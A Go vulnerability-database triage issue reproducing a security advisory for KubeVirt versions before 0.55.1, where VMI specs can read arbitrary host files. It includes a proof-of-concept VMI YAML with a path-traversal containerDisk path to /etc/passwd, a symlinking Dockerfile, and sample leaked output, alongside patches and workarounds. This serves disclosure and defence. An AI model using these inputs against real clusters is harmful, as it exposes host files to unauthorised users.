x/vulndb: potential Go vuln in kubevirt.io/kubevirt: GHSA-qv98-3369-g364

[GoVulnBot]

In GitHub Security Advisory GHSA-qv98-3369-g364, there is a vulnerability in the following Go packages or modules:

Unit	Fixed	Vulnerable Ranges
kubevirt.io/kubevirt	0.55.1	>= 0.20, < 0.55.1

See doc/triage.md for instructions on how to triage this report.

modules:
  - module: TODO
    versions:
      - introduced: 0.20.0
        fixed: 0.55.1
    packages:
      - package: kubevirt.io/kubevirt
description: "### Impact\n\nUsers with the permission to create VMIs can construct
    VMI specs which allow them to read arbitrary files on the host. There are three
    main attack vectors:\n\n1. Some path fields on the VMI spec were not properly
    validated and allowed passing in relative paths which would have been mounted
    into the virt-launcher pod. The fields are: `spec.domain.firmware.kernelBoot.container.kernelPath`,
    `spec.domain.firmware.kernelBoot.container.initrdPath` as well as `spec.volumes[*].containerDisk.path`.\n\nExample:\n\n```yaml\napiVersion:
    [kubevirt.io/v1](http://kubevirt.io/v1)\nkind: VirtualMachineInstance\nmetadata:\n
    \ name: vmi-fedora\nspec:\n  domain:\n    devices:\n      disks:\n      - disk:\n
    \         bus: virtio\n        name: containerdisk\n      - disk:\n          bus:
    virtio\n        name: cloudinitdisk\n      - disk:\n          bus: virtio\n        name:
    containerdisk1\n      rng: {}\n    resources:\n      requests:\n        memory:
    1024M\n  terminationGracePeriodSeconds: 0\n  volumes:\n  - containerDisk:\n      image:
    [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)\n
    \   name: containerdisk\n  - containerDisk:\n      image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)\n
    \     path: test3/../../../../../../../../etc/passwd\n    name: containerdisk1\n
    \ - cloudInitNoCloud:\n      userData: |\n        #!/bin/sh\n        echo 'just
    something to make cirros happy'\n    name: cloudinitdisk\n```\n\n2. Instead of
    passing in relative links on the API, using malicious links in the containerDisk
    itself can have the same effect:\n\n```Dockerfile\nFROM <anybase>\nRUN mkdir -p
    /etc/ && touch /etc/passwd\nRUN mkdir -p /disks/ && ln -s /etc/passwd /disks/disk.img\n```\n\n3.
    KubeVirt allows PVC hotplugging. The hotplugged PVC is under user-control and
    it is possible to place absolute links there. Since containerDisk and hotplug
    code use the same mechanism to provide the disk to the virt-launcher pod, it can
    be used too to do arbitrary host file reads.\n\nIn all three cases it is then
    possible to at lest read any host file:\n\n```\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n```\n\n\n###
    Patches\n\nKubeVirt 0.55.1 provides patches to fix the vulnerability.\n\n\n###
    Workarounds\n\n* Ensure that the `HotplugVolumes` feature-gate is disabled\n*
    ContainerDisk support can't be disabled. The only known way to mitigate this issue
    is create with e.g. policy controller a conditiontemplate which ensures that no
    containerDisk gets added and that `spec.domain.firmware.kernelBoot` is not used
    on VirtualMachineInstances.|\n* Ensure that SELinux is enabled. It blocks most
    attempts to read host files but does not provide a 100% guarantee (like vm-to-vm
    read may still work).\n\n### References\n\n\nDisclosure notice form the discovering
    party: https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm\n\n###
    For more information\n\nFor interested vendors which have to provide a fix for
    their supported versions, the following PRs are providing the fix:\n\n * https://github.com/kubevirt/kubevirt/pull/8198\n
    * https://github.com/kubevirt/kubevirt/pull/8268\n \n### Credits\nOliver Brooks
    and James Klopchic of NCC Group\nDiane Dubois and Roman Mohr of Google\n"
ghsas:
  - GHSA-qv98-3369-g364

[gopherbot]

Change https://go.dev/cl/432217 mentions this issue: data/excluded: add GO-2022-1000.yaml for GHSA-qv98-3369-g364

[gopherbot]

Change https://go.dev/cl/592774 mentions this issue: data/reports: unexclude 50 reports

[gopherbot]

Change https://go.dev/cl/607230 mentions this issue: data/reports: unexclude 20 reports (28)